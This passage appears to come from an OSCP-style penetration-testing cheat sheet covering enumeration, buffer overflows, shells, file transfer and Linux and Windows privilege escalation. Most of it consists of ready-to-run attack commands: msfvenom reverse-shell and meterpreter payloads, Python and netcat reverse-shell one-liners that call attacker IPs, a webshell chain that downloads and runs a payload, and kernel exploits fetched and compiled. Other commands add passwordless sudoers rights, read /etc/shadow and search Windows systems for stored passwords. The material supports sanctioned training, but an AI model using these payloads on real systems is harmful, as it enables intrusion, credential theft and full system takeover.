\n [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)\n\n- Nmap Vuln Scanning \n [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)\n\n- NMap DOS Scanning \n `nmap --script dos -Pn $ip \n NMap Execute DOS Attack \n nmap --max-parallelism 750 -Pn --script http-slowloris --script-args\n http-slowloris.runforever=true`\n\n- Scan for coldfusion web vulnerabilities \n `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`\n\n- Anonymous FTP dump with Nmap \n `nmap -v -p 21 --script=ftp-anon.nse $ip-254`\n\n- SMB Security mode scan with Nmap \n `nmap -v -p 21 --script=ftp-anon.nse $ip-254`\n\n- File Enumeration\n\n - Find UID 0 files root execution\n\n - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\\\; 2>/dev/null`\n\n - Get handy linux file system enumeration script (/var/tmp) \n `wget https://highon.coffee/downloads/linux-local-enum.sh `\n `chmod +x ./linux-local-enum.sh `\n `./linux-local-enum.sh`\n\n - Find executable files updated in August \n `find / -executable -type f 2> /dev/null | egrep -v \"^/bin|^/var|^/etc|^/usr\" | xargs ls -lh | grep Aug`\n\n - Find a specific file on linux \n `find /. -name suid\\*`\n\n - Find all the strings in a file \n `strings `\n\n - Determine the type of a file \n `file `\n\n- HTTP Enumeration\n ----------------\n\n - Search for folders with gobuster: \n `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`\n\n - OWasp DirBuster - Http folder enumeration - can take a dictionary file\n\n - Dirb - Directory brute force finding using a dictionary file \n `dirb http://$ip/ wordlist.dict `\n `dirb `\n \n Dirb against a proxy\n\n - `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`\n\n - Nikto \n `nikto -h $ip`\n\n - HTTP Enumeration with NMAP \n `nmap --script=http-enum -p80 -n $ip/24`\n\n - Nmap Check the server methods \n `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`\n\n - Get Options available from web server\n `curl -vX OPTIONS vm/test`\n\n - Uniscan directory finder: \n `uniscan -qweds -u `\n\n - Wfuzz - The web brute forcer\n \n `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `\n \n `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `\n \n `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt \"$ip:60080/?page=mailer&mail=FUZZ\"`\n \n `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`\n \n Recurse level 3\n \n `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`\n\n\n\n- Open a service using a port knock (Secured with Knockd) \n for x in 7000 8000 9000; do nmap -Pn --host\\_timeout 201\n --max-retries 0 -p $x server\\_ip\\_address; done\n\n- WordPress Scan - Wordpress security scanner\n\n - wpscan --url $ip/blog --proxy $ip:3129\n\n- RSH Enumeration - Unencrypted file transfer system\n\n - auxiliary/scanner/rservices/rsh\\_login\n\n- Finger Enumeration\n\n - finger @$ip\n\n - finger batman@$ip\n\n- TLS & SSL Testing\n\n - ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha >\n OUTPUT-FILE.html\n\n- Proxy Enumeration (useful for open proxies)\n\n - nikto -useproxy http://$ip:3128 -h $ip\n\n- Steganography\n\n> apt-get install steghide\n>\n> steghide extract -sf picture.jpg\n>\n> steghide info picture.jpg\n>\n> apt-get install stegosuite\n\n- The OpenVAS Vulnerability Scanner\n\n - apt-get update \n apt-get install openvas \n openvas-setup\n\n - netstat -tulpn\n\n - Login at: \n https://$ip:9392\n\nBuffer Overflows and Exploits\n===================================================================================================================================\n\n- DEP and ASLR - Data Execution Prevention (DEP) and Address Space\n Layout Randomization (ASLR)\n\n\n- Nmap Fuzzers:\n\n - NMap Fuzzer List \n [https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)\n\n - NMap HTTP Form Fuzzer \n nmap --script http-form-fuzzer --script-args\n 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'\n -p 80 $ip\n\n - Nmap DNS Fuzzer \n nmap --script dns-fuzz --script-args timelimit=2h $ip -d\n\n- MSFvenom \n [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)\n\n- Windows Buffer Overflows\n\n - Controlling EIP\n \n locate pattern_create\n pattern_create.rb -l 2700\n locate pattern_offset\n pattern_offset.rb -q 39694438\n\n - Verify exact location of EIP - [\\*] Exact match at offset 2606\n\n buffer = \"A\" \\* 2606 + \"B\" \\* 4 + \"C\" \\* 90\n\n - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF\n\n - Use Mona to determine a module that is unprotected\n\n - Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP\n\n - Use NASM to determine the HEX code for a JMP ESP instruction\n\n /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb\n\n JMP ESP \n 00000000 FFE4 jmp esp\n\n - Run Mona in immunity log window to find (FFE4) XEF command\n\n !mona find -s \"\\xff\\xe4\" -m slmfc.dll \n found at 0x5f4a358f - Flip around for little endian format\n buffer = \"A\" * 2606 + \"\\x8f\\x35\\x4a\\x5f\" + \"C\" * 390\n\n - MSFVenom to create payload\n \n msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b \"\\x00\\x0a\\x0d\"\n\n - Final Payload with NOP slide \n \n buffer=\"A\"*2606 + \"\\x8f\\x35\\x4a\\x5f\" + \"\\x90\" * 8 + shellcode\n\n - Create a PE Reverse Shell \n msfvenom -p windows/shell\\_reverse\\_tcp LHOST=$ip LPORT=4444\n -f \n exe -o shell\\_reverse.exe\n\n - Create a PE Reverse Shell and Encode 9 times with\n Shikata\\_ga\\_nai \n msfvenom -p windows/shell\\_reverse\\_tcp LHOST=$ip LPORT=4444\n -f \n exe -e x86/shikata\\_ga\\_nai -i 9 -o\n shell\\_reverse\\_msf\\_encoded.exe\n\n - Create a PE reverse shell and embed it into an existing\n executable \n msfvenom -p windows/shell\\_reverse\\_tcp LHOST=$ip LPORT=4444 -f\n exe -e x86/shikata\\_ga\\_nai -i 9 -x\n /usr/share/windows-binaries/plink.exe -o\n shell\\_reverse\\_msf\\_encoded\\_embedded.exe\n\n - Create a PE Reverse HTTPS shell \n msfvenom -p windows/meterpreter/reverse\\_https LHOST=$ip\n LPORT=443 -f exe -o met\\_https\\_reverse.exe\n\n- Linux Buffer Overflows\n\n - Run Evans Debugger against an app \n edb --run /usr/games/crossfire/bin/crossfire\n\n - ESP register points toward the end of our CBuffer \n add eax,12 \n jmp eax \n 83C00C add eax,byte +0xc \n FFE0 jmp eax\n\n - Check for “Bad Characters” Process of elimination - Run multiple\n times 0x00 - 0xFF\n\n - Find JMP ESP address \n \"\\\\x97\\\\x45\\\\x13\\\\x08\" \\# Found at Address 08134597\n\n - crash = \"\\\\x41\" \\* 4368 + \"\\\\x97\\\\x45\\\\x13\\\\x08\" +\n \"\\\\x83\\\\xc0\\\\x0c\\\\xff\\\\xe0\\\\x90\\\\x90\"\n\n - msfvenom -p linux/x86/shell\\_bind\\_tcp LPORT=4444 -f c -b\n \"\\\\x00\\\\x0a\\\\x0d\\\\x20\" –e x86/shikata\\_ga\\_nai\n\n - Connect to the shell with netcat: \n nc -v $ip 4444\n \nShells\n===================================================================================================================================\n\n- Netcat Shell Listener \n\n `nc -nlvp 4444`\n\n- Spawning a TTY Shell - Break out of Jail or limited shell\n You should almost always upgrade your shell after taking control of an apache or www user.\n \n (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )\n \n (hint: sudo -l to see what you can run)\n \n - You may encounter limited shells that use rbash and only allow you to execute a single command per session.\n You can overcome this by executing an SSH shell to your localhost:\n \n ssh user@$ip nc $localip 4444 -e /bin/sh\n enter user's password\n python -c 'import pty; pty.spawn(\"/bin/sh\")'\n export TERM=linux\n \n `python -c 'import pty; pty.spawn(\"/bin/sh\")'`\n\n python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\\_INET,socket.SOCK\\_STREAM); s.connect((\"$ip\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\\[\"/bin/sh\",\"-i\"\\]);'\n\n `echo os.system('/bin/bash')`\n\n `/bin/sh -i`\n\n `perl —e 'exec \"/bin/sh\";'`\n\n perl: `exec \"/bin/sh\";`\n\n ruby: `exec \"/bin/sh\"`\n\n lua: `os.execute('/bin/sh')`\n\n From within IRB: `exec \"/bin/sh\"`\n\n\n From within vi: `:!bash`\n or\n \n `:set shell=/bin/bash:shell`\n \n From within vim `':!bash':`\n\n From within nmap: `!sh`\n\n From within tcpdump\n \n echo $’id\\\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root\n\n From busybox `/bin/busybox telnetd -|/bin/sh -p9999`\n\n- Pen test monkey PHP reverse shell \n [http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)\n\n- php-findsock-shell - turns PHP port 80 into an interactive shell \n [http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)\n\n- Perl Reverse Shell \n [http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)\n\n- PHP powered web browser Shell b374k with file upload etc. \n [https://github.com/b374k/b374k](https://github.com/b374k/b374k)\n\n- Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell \n https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1\n \n- Web Backdoors from Fuzzdb \n https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors\n\n- Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/\n \n *Linux*\n \n `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf`\n \n *Windows*\n \n `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe`\n \n *Mac*\n\n `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho`\n \n **Web Payloads**\n \n *PHP*\n \n `msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php`\n \n OR\n \n `msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php`\n \n Then we need to add the shell.php && pbpaste >> shell.php`\n \n *ASP*\n\n `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp`\n \n *JSP*\n\n `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp`\n \n *WAR*\n\n `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war`\n \n **Scripting Payloads**\n \n *Python*\n\n `msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py`\n \n *Bash*\n\n `msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh`\n \n *Perl*\n\n `msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl`\n \n **Shellcode**\n \n For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.\n\n *Linux Based Shellcode*\n\n `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f `\n \n *Windows Based Shellcode*\n\n `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f `\n \n *Mac Based Shellcode*\n\n `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f `\n\n **Handlers**\n Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.\n\n use exploit/multi/handler\n set PAYLOAD \n set LHOST \n set LPORT \n set ExitOnSession false\n exploit -j -z\n \n Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘\n\n- SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/\n\n use auxiliary/scanner/ssh/ssh_login\n use post/multi/manage/shell_to_meterpreter\n\n- SBD.exe\n\n sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only.\n sbd.exe (part of the Kali linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a windows box as a Netcat alternative.\n\n- Shellshock\n\n - Testing for shell shock with NMap\n \n `root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`\n\n - git clone https://github.com/nccgroup/shocker\n\n `./shocker.py -H TARGET --command \"/bin/cat /etc/passwd\" -c /cgi-bin/status --verbose`\n\n - Shell Shock SSH Forced Command \n Check for forced command by enabling all debug output with ssh \n \n ssh -vvv \n ssh -i noob noob@$ip '() { :;}; /bin/bash'\n\n - cat file (view file contents) \n \n echo -e \"HEAD /cgi-bin/status HTTP/1.1\\\\r\\\\nUser-Agent: () {:;}; echo \\\\$( 80, :DocumentRoot => Dir.pwd).start\"\n\n - Run a basic PHP http server \n php -S $ip:80\n\n- Creating a wget VB Script on Windows: \n [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)\n\n- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):\n\n echo Set args = Wscript.Arguments >> webdl.vbs\n timeout 1\n echo Url = \"http://1.1.1.1/windows-privesc-check2.exe\" >> webdl.vbs\n timeout 1\n echo dim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\") >> webdl.vbs\n timeout 1\n echo dim bStrm: Set bStrm = createobject(\"Adodb.Stream\") >> webdl.vbs\n timeout 1\n echo xHttp.Open \"GET\", Url, False >> webdl.vbs\n timeout 1\n echo xHttp.Send >> webdl.vbs\n timeout 1\n echo with bStrm >> webdl.vbs\n timeout 1\n echo \t.type = 1 ' >> webdl.vbs\n timeout 1\n echo \t.open >> webdl.vbs\n timeout 1\n echo \t.write xHttp.responseBody >> webdl.vbs\n timeout 1\n echo \t.savetofile \"C:\\temp\\windows-privesc-check2.exe\", 2 ' >> webdl.vbs\n timeout 1\n echo end with >> webdl.vbs\n timeout 1\n echo\n\n The file can be run using the following syntax:\n \n `C:\\temp\\cscript.exe webdl.vbs`\n \n- Mounting File Shares\n\n - Mount NFS share to /mnt/nfs \n mount $ip:/vol/share /mnt/nfs\n\n- HTTP Put \n nmap -p80 $ip --script http-put --script-args\n http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php\n\n- Uploading Files\n -------------------------------------------------------------------------------------------------------------\n\n - SCP\n \n scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2\n \n scp localfile username@$ip:~/Folder/\n \n scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~\n \n\n - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor\n \n `davtest -move -sendbd auto -url http://$ip`\n \n https://github.com/cldrn/davtest\n \n You can also upload a file using the PUT method with the curl command:\n \n `curl -T 'leetshellz.txt' 'http://$ip'`\n \n And rename it to an executable file using the MOVE method with the curl command:\n\n `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`\n\n - Upload shell using limited php shell cmd \n use the webshell to download and execute the meterpreter \n \\[curl -s --data \"cmd=wget http://174.0.42.42:8000/dhn -O\n /tmp/evil\" http://$ip/files/sh.php \n \\[curl -s --data \"cmd=chmod 777 /tmp/evil\"\n http://$ip/files/sh.php \n curl -s --data \"cmd=bash -c /tmp/evil\" http://$ip/files/sh.php\n\n - TFTP \n mkdir /tftp \n atftpd --daemon --port 69 /tftp \n cp /usr/share/windows-binaries/nc.exe /tftp/ \n EX. FROM WINDOWS HOST: \n C:\\\\Users\\\\Offsec>tftp -i $ip get nc.exe\n\n - FTP \n apt-get update && apt-get install pure-ftpd \n \n \\#!/bin/bash \n groupadd ftpgroup \n useradd -g ftpgroup -d /dev/null -s /etc ftpuser \n pure-pw useradd offsec -u ftpuser -d /ftphome \n pure-pw mkdb \n cd /etc/pure-ftpd/auth/ \n ln -s ../conf/PureDB 60pdb \n mkdir -p /ftphome \n chown -R ftpuser:ftpgroup /ftphome/ \n \n /etc/init.d/pure-ftpd restart\n\n- Packing Files\n -------------------------------------------------------------------------------------------------------------\n\n - Ultimate Packer for eXecutables \n upx -9 nc.exe\n\n - exe2bat - Converts EXE to a text file that can be copied and\n pasted \n locate exe2bat \n wine exe2bat.exe nc.exe nc.txt\n\n - Veil - Evasion Framework -\n https://github.com/Veil-Framework/Veil-Evasion \n apt-get -y install git \n git clone https://github.com/Veil-Framework/Veil-Evasion.git \n cd Veil-Evasion/ \n cd setup \n setup.sh -c\n\nPrivilege Escalation\n==================================================================================================================\n\n*Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*\n\n\n- Linux Privilege Escalation\n ------------------------------------------------------------------------------------------------------------------------\n\n- Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:\n [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\n\n- Try the obvious - Maybe the user is root or can sudo to root: \n \n `id` \n \n `sudo su`\n \n- Here are the commands I have learned to use to perform linux enumeration and privledge escalation:\n\n What users can login to this box (Do they use thier username as thier password)?:\n \n `grep -vE \"nologin|false\" /etc/passwd` \n \n What kernel version are we using? Do we have any kernel exploits for this version?\n \n `uname -a`\n \n `searchsploit linux kernel 3.2 --exclude=\"(PoC)|/dos/\"`\n \n What applications have active connections?:\n \n `netstat -tulpn`\n\n What services are running as root?:\n \n `ps aux | grep root`\n \n What files run as root / SUID / GUID?:\n\n find / -perm +2000 -user root -type f -print\n find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.\n find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.\n find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.\n find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID\n for i in `locate -r \"bin$\"`; do find $i \\( -perm -4000 -o -perm -2000 \\) -type f 2>/dev/null; done \n find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null\n\n What folders are world writeable?:\n \n find / -writable -type d 2>/dev/null # world-writeable folders\n find / -perm -222 -type d 2>/dev/null # world-writeable folders\n find / -perm -o w -type d 2>/dev/null # world-writeable folders\n find / -perm -o x -type d 2>/dev/null # world-executable folders\n find / \\( -perm -o w -perm -o x \\) -type d 2>/dev/null # world-writeable & executable folders\n \n- There are a few scripts that can automate the linux enumeration process:\n\n - Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course.\n\n - LinuxPrivChecker.py - My favorite automated linux priv enumeration checker - \n \n [https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py)\n\n - LinEnum - (Recently Updated)\n \n [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)\n \n - linux-exploit-suggester (Recently Updated)\n \n [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\n \n - Highon.coffee Linux Local Enum - Great enumeration script!\n \n `wget https://highon.coffee/downloads/linux-local-enum.sh`\n\n - Linux Privilege Exploit Suggester (Old has not been updated in years)\n \n [https://github.com/PenturaLabs/Linux\\_Exploit\\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)\n\n - Linux post exploitation enumeration and exploit checking tools \n \n [https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp)\n \n\nHandy Kernel Exploits\n\n- CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)\n\n [https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/)\n \n wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814\n $ gcc i-can-haz-modharden.c -o i-can-haz-modharden\n $ ./i-can-haz-modharden\n [+] launching root shell!\n # id\n uid=0(root) gid=0(root)\n\n- CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 \n [https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/)\n\n- CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) \n [https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/) \n Linux CVE 2012-0056 \n \n wget -O exploit.c http://www.exploit-db.com/download/18411 \n gcc -o mempodipper exploit.c \n ./mempodipper\n\n- CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 \n [https://dirtycow.ninja/](https://dirtycow.ninja/) \n First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016 \n\n- Run a command as a user other than root \n\n sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf\n\n- Add a user or change a password\n\n /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor \n echo thePassword | passwd haxzor --stdin\n\n- Local Privilege Escalation Exploit in Linux\n\n - **SUID** (**S**et owner **U**ser **ID** up on execution) \n Often SUID C binary files are required to spawn a shell as a\n superuser, you can update the UID / GID and shell as required. \n \n below are some quick copy and paste examples for various\n shells: \n \n SUID C Shell for /bin/bash \n\n int main(void){ \n setresuid(0, 0, 0); \n system(\"/bin/bash\"); \n } \n\n SUID C Shell for /bin/sh \n\n int main(void){ \n setresuid(0, 0, 0); \n system(\"/bin/sh\"); \n } \n\n Building the SUID Shell binary \n gcc -o suid suid.c \n For 32 bit: \n gcc -m32 -o suid suid.c\n\n - Create and compile an SUID from a limited shell (no file transfer) \n \n echo \"int main(void){\\nsetgid(0);\\nsetuid(0);\\nsystem(\\\"/bin/sh\\\");\\n}\" >privsc.c \n gcc privsc.c -o privsc\n\n- Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:\n\n `echo 'chmod 777 /etc/sudoers && echo \"www-data ALL=NOPASSWD:ALL\" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`\n \n- You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable\n to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on \n port 4444.\n \n set PATH=\"/tmp:/usr/local/bin:/usr/bin:/bin\"\n echo \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f\" >> /tmp/ssh\n chmod +x ssh\n\n- SearchSploit \n\n searchsploit –uncsearchsploit apache 2.2 \n searchsploit \"Linux Kernel\" \n searchsploit linux 2.6 | grep -i ubuntu | grep local \n searchsploit slmail\n\n - Kernel Exploit Suggestions for Kernel Version 3.0.0 \n \n `./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`\n\n- Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***\n\n [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/) \n\n- Collect root password\n\n `cat /etc/shadow |grep root`\n \n- Find and display the proof.txt or flag.txt - LOOT!\n\n cat `find / -name proof.txt -print`\n\n- Windows Privilege Escalation\n --------------------------------------------------------------------------------------------------------------------------\n\n- Windows Privilege Escalation resource\n http://www.fuzzysecurity.com/tutorials/16.html\n\n- Metasploit Meterpreter Privilege Escalation Guide\n https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/\n\n- Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group: \n \n `whoami` \n \n `net user \"%username%\"`\n\n- Try the getsystem command using meterpreter - rarely works but is worth a try.\n\n `meterpreter > getsystem`\n\n- No File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial and windows_privesc_check.py).\n \n Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report:\n\n @echo --------- BASIC WINDOWS RECON --------- > report.txt\n timeout 1\n net config Workstation >> report.txt\n timeout 1\n systeminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\" >> report.txt\n timeout 1\n hostname >> report.txt\n timeout 1\n net users >> report.txt\n timeout 1\n ipconfig /all >> report.txt\n timeout 1\n route print >> report.txt\n timeout 1\n arp -A >> report.txt\n timeout 1\n netstat -ano >> report.txt\n timeout 1\n netsh firewall show state >> report.txt\t\n timeout 1\n netsh firewall show config >> report.txt\n timeout 1\n schtasks /query /fo LIST /v >> report.txt\n timeout 1\n tasklist /SVC >> report.txt\n timeout 1\n net start >> report.txt\n timeout 1\n DRIVERQUERY >> report.txt\n timeout 1\n reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated >> report.txt\n timeout 1\n reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated >> report.txt\n timeout 1\n dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt\n timeout 1\n findstr /si password *.xml *.ini *.txt >> report.txt\n timeout 1\n reg query HKLM /f password /t REG_SZ /s >> report.txt\n timeout 1\n reg query HKCU /f password /t REG_SZ /s >> report.txt \n timeout 1\n dir \"C:\\\"\n timeout 1\n dir \"C:\\Program Files\\\" >> report.txt\n timeout 1\n dir \"C:\\Program Files (x86)\\\"\n timeout 1\n dir \"C:\\Users\\\"\n timeout 1\n dir \"C:\\Users\\Public\\\"\n timeout 1\n echo REPORT COMPLETE!\n\n\n- Windows Server 2003 and IIS 6.0 WEBDAV Exploiting\nhttp://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html\n\n msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt\n\n cadavar http://$ip\n dav:/> put aspshell.txt\n Uploading aspshell.txt to `/aspshell.txt':\n Progress: [=============================>] 100.0% of 38468 bytes succeeded.\n dav:/> copy aspshell.txt aspshell3.asp;.txt\n Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.\n dav:/> exit\n\n msf > use exploit/multi/handler\n msf exploit(handler) > set payload windows/meterpreter/reverse_tcp\n msf exploit(handler) > set LHOST 1.2.3.4\n msf exploit(handler) > set LPORT 80\n msf exploit(handler) > set ExitOnSession false\n msf exploit(handler) > exploit -j\n\n curl http://$ip/aspshell3.asp;.txt\n\n [*] Started reverse TCP handler on 1.2.3.4:443 \n [*] Starting the payload handler...\n [*] Sending stage (957487 bytes) to 1.2.3.5\n [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700\n\n- Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.\n\n pip install pyinstaller\n wget -O exploit.py http://www.exploit-db.com/download/31853 \n python pyinstaller.py --onefile exploit.py\n\n- Windows Server 2003 and IIS 6.0 privledge escalation using impersonation: \n\n https://www.exploit-db.com/exploits/6705/\n \n https://github.com/Re4son/Churrasco\n \n c:\\Inetpub>churrasco\n churrasco\n /churrasco/-->Usage: Churrasco.exe [-d] \"command to run\"\n\n c:\\Inetpub>churrasco -d \"net user /add \"\n c:\\Inetpub>churrasco -d \"net localgroup administrators /add\"\n c:\\Inetpub>churrasco -d \"NET LOCALGROUP \"Remote Desktop Users\" /ADD\"\n\n- Windows MS11-080 - http://www.exploit-db.com/exploits/18176/ \n \n python pyinstaller.py --onefile ms11-080.py \n mx11-080.exe -O XP\n \n- Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:\n\n MS16-032 https://www.exploit-db.com/exploits/39719/\n \n `powershell -ExecutionPolicy ByPass -command \"& { . C:\\Users\\Public\\Invoke-MS16-032.ps1; Invoke-MS16-032 }\"`\n \n \n- Powershell Priv Escalation Tools\n https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc\n\n- Windows Run As - Switching users in linux is trival with the `SU` command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.\n\n - Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).\n\n C:\\>psexec64 \\\\COMPUTERNAME -u Test -p test -h \"c:\\users\\public\\nc.exe -nc 192.168.1.10 4444 -e cmd.exe\" \n\n PsExec v2.2 - Execute processes remotely\n Copyright (C) 2001-2016 Mark Russinovich\n Sysinternals - www.sysinternals.com\n\n - Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows 